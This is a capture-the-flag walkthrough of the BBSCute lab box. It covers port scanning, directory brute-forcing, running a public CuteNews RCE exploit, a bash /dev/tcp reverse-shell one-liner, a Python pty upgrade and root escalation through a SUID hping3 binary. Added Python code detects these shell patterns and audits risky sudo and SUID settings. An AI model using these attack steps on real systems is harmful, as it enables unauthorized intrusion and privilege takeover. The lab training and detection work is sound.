PG — BBSCute — Walkthrough (Offensive Security Proving Grounds Play Boxes)
Introduction
This article walks you through the BBSCute box, created by foxlox and hosted on Offensive Security’s Proving Grounds Labs. Anyone with access to Vulnhub or Offensive Security’s Proving Grounds Play or Practice can try to pwn this Linux box. It is an easy and fun boot2root box. Hope you enjoy reading the walkthrough!
Reconnaissance
As we are already provided with the IP address of the box, we will scan it with Nmap.
Scanning
We are going to scan the 1000 default ports of the IP by typing the following command in our terminal.
nmap 192.168.x.x
After a short while, we have got our results as shown below:
To gather further information on the ports found by nmap, we add a few more arguments and specify the open ports. -sV detects the service versions of the applications on the open ports, and -sC runs the default scripts against those services to check for known weaknesses.
nmap -p 22,80,88,110,995 192.168.x.x -sV -sC
In a short while we have our results, with more details on the open ports. We decide to start enumeration on port 80, which runs a default Apache web server: port 22 is not a logical starting point, since SSH does not offer as broad an attack surface as an HTTP server does. Port 88 is also an HTTP server, hosting nginx, but it returns a 404 Not Found error when we try to connect and reveals nothing of interest. Ports 110 and 995 do not give us a useful path to follow either.
Enumeration
We open our browser and type in the IP address of the box.
Now we will use gobuster to brute-force directories and see whether there is anything useful. We use the -u argument to specify the URL and the -w argument to provide the wordlist for directory brute-forcing. To avoid creating noise on the server, or being blocked by a firewall if there is one in front of it, we limit the threads to 5 with the -t argument.
gobuster dir -u http://192.168.x.x/ -w /usr/share/wordlists/dirb/common.txt -t 5
Gobuster reveals several directories, but the only useful one is index.php, which turns out to be a login page.
After trying to log in with common credentials such as admin:admin, we are still not able to log in. We then notice that the name and version number of the CMS are visible under the login section of the page, which we will investigate further.
So we run searchsploit with the name and version number in our terminal to see whether there is a public exploit.
There are four different public exploits. We will not use Metasploit, in order to keep our skills sharp, and instead check the Python script, 48800.py, since it gives us the opportunity to get Remote Code Execution (RCE) on the server.
Before using it, we need to change several lines of the exploit code to make it work against our web server. The first line that needs to be altered is shown below:
As we do not have a directory called /CuteNews on our web server, we delete it from this line and from the following lines, otherwise our Python script will not work!
We are now ready to exploit the web server with the Python script we edited.
Exploitation
We execute our Python script to connect to the web server:
python3 48800.py
The exploit asks for the URL of the web server we want to exploit, and we provide it. After typing our URL and hitting enter, we have command execution on the web server.
To get a netcat shell, we set up a netcat listener on port 443 in our terminal; this port is usually trusted by firewalls, so it often works for a reverse shell.
Then we type the following command to be executed on the server for a reverse shell.
echo 'bash -i >& /dev/tcp/192.168.x.x/443 0>&1' | bash
And we have a netcat shell on the web server.
Now we can look for the low-privilege shell hash with the following command and cat it.
find / -name local.txt 2>/dev/null
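As an added example (not part of the original walkthrough), this is the detection side of the shell obtained above: a small Python scanner that flags the two patterns used on this box, bash's /dev/tcp redirection and a Python pty.spawn, in auditd-style EXECVE records. The log lines and event IDs are constructed for illustration.

```python
import re

# Constructed auditd-style EXECVE records (not taken from the box). Real auditd
# hex-encodes arguments containing spaces or quotes, so decode a*= fields with
# ausearch -i or similar before applying these patterns to production logs.
SAMPLE_LOGS = [
    'type=EXECVE msg=audit(1700000000.101:201): argc=3 a0="sh" a1="-c" '
    'a2="echo \'bash -i >& /dev/tcp/192.168.x.x/443 0>&1\' | bash"',
    'type=EXECVE msg=audit(1700000000.102:202): argc=3 a0="python3" a1="-c" '
    'a2="__import__(\'pty\').spawn(\'/bin/bash\')"',
    'type=EXECVE msg=audit(1700000000.103:203): argc=2 a0="curl" a1="https://example.com/updates"',
    'type=EXECVE msg=audit(1700000000.104:204): argc=2 a0="bash" a1="backup.sh"',
]

# Two signatures from this walkthrough: bash's /dev/tcp (or /dev/udp) pseudo-device
# redirection, and an interactive pty spawned from Python to upgrade the shell.
PATTERNS = {
    "bash_dev_tcp_reverse_shell": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    "python_pty_shell": re.compile(r"\bpty\b.*\.spawn\("),
}

def classify(line):
    """Return the names of every pattern that matches one log line."""
    return [name for name, rx in PATTERNS.items() if rx.search(line)]

def scan(lines):
    """Return (audit event id, pattern name) for each suspicious line."""
    hits = []
    for line in lines:
        m = re.search(r"audit\([\d.]+:(\d+)\)", line)
        event_id = m.group(1) if m else "?"
        hits.extend((event_id, name) for name in classify(line))
    return hits

if __name__ == "__main__":
    for event_id, name in scan(SAMPLE_LOGS):
        print(f"event {event_id}: {name}")
```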
Privilege Escalation
Privilege escalation on this box was easy. There are a few standard enumeration steps to run after getting a low-privilege shell, and the first one we tried on this box, checking the sudo permissions of the current user by typing sudo -l in the terminal, is the first step of the privilege escalation.
We see that we can execute hping3 with sudo permissions.
Since our low-privilege shell is not a TTY shell, we are not able to run hping3. We will try to get a TTY shell from an interpreter.
We execute /bin/sh -i, and then get a TTY shell with the following command.
python3 -c "__import__('pty').spawn('/bin/bash')"
Now we are able to execute hping3, but if we run it with sudo as the sudo -l output suggests, it asks for a password. Since we also see that the hping3 binary has the SUID bit set, we check GTFOBins and find that we can execute commands as the root user from the hping3 interactive prompt.
We get the hping3 prompt by simply typing hping3, and then escalate our privileges as shown below.
As we can see, we are able to execute commands as root, since our effective user ID is root. So let us cat the root hash.
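As an added example, not part of the original walkthrough, this Python audit performs the two checks a defender would run against the misconfiguration used here: a sudo rule for hping3 and a SUID bit on a binary that can hand out a shell. The sudo -l output and the SUID listing are constructed samples, and the SHELL_CAPABLE set is an assumed shortlist, not a complete list.

```python
import re

# Assumed shortlist of programs that can give the caller a shell or arbitrary
# file access when run with elevated rights; hping3 is the one this box relies on.
SHELL_CAPABLE = {"hping3", "vim", "find", "python3", "bash", "less", "awk"}

# Constructed sample of `sudo -l` output for a low-privilege user (not from the box).
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on bbscute:
    env_reset, mail_badpass

User user may run the following commands on bbscute:
    (ALL : ALL) /usr/sbin/hping3
    (root) NOPASSWD: /usr/bin/systemctl status
"""

# Constructed sample of `find / -perm -4000 -type f 2>/dev/null` output.
SAMPLE_SUID = ["/usr/bin/passwd", "/usr/sbin/hping3", "/usr/bin/sudo"]

def parse_sudo_rules(text):
    """Extract (runas, nopasswd, path) from the command lines of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = re.match(r"\s+\(([^)]+)\)\s*(NOPASSWD:)?\s*(\S+)", line)
        if m:
            rules.append((m.group(1), m.group(2) is not None, m.group(3)))
    return rules

def audit(sudo_text, suid_paths):
    """Return human-readable findings; an empty list means nothing risky was seen.

    Remediation for a hit is to drop the sudo rule (or restrict it to a wrapper
    script) and to clear the SUID bit, e.g. chmod u-s on the binary.
    """
    findings = []
    for runas, nopasswd, path in parse_sudo_rules(sudo_text):
        name = path.rsplit("/", 1)[-1]
        if name in SHELL_CAPABLE:
            suffix = " without a password" if nopasswd else ""
            findings.append(f"sudo rule grants {name} as ({runas}){suffix}")
    for path in suid_paths:
        if path.rsplit("/", 1)[-1] in SHELL_CAPABLE:
            findings.append(f"SUID bit set on shell-capable binary {path}")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L, SAMPLE_SUID):
        print(finding)
```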
Now we have full authority on the box. Enjoy!